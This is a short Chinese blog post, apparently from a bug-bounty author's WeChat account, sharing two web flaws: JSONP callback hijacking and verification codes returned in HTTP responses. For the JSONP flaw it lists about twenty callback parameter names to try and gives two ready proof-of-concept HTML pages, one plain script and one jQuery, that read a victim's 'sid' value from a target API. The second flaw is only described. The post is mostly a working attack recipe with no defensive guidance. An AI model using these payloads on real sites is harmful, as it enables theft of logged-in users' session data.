“ 是真滴没用,也没啥技术含量”
01.jsonp漏洞
—
随手测试的,就加上各种参数即可,请求方式为 GET,没有验证 referer 等,都可以尝试下该漏洞
_callback=xxx
_cb=xxx
callback=xxx
cb=xxx
jsonp=xxx
jsonpcallback=xxx
jsonpcb=xxx
jsonp_cb=xxx
json=xxx
jsoncallback=xxx
jcb=xxx
call=xxx
callBack=xxx
jsonpCallback=xxx
jsonpCb=xxx
jsonp_Cb=xxx
jsonCallback=xxx
ca=xxx
<script>
function xxx(data)
{
alert(data.sid);//修改这里,就可以获取里面对应的值
}
</script>
<script src="http://target/api.html?&callback=xxx"></script>
还有一个jquery的poc也附在下边
<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>
<script type="text/javascript">
$.getJSON("http://target/api.html?callback=?", function(data){
alert(data.sid);
});
</script>
02.返回包存在验证码
—
是在一个绑定用户的地方存在的,凡是存在这种发送验证码的地方,都有可能存在这种漏洞,前几次将src挖掘,我也都分享过具体案例
---------------------
---------------------
欢迎关注公众号:虚拟尽头
师傅们,聊天框发送"二维码",加我好友一起交流呀(加的时候请备注来自公众号)。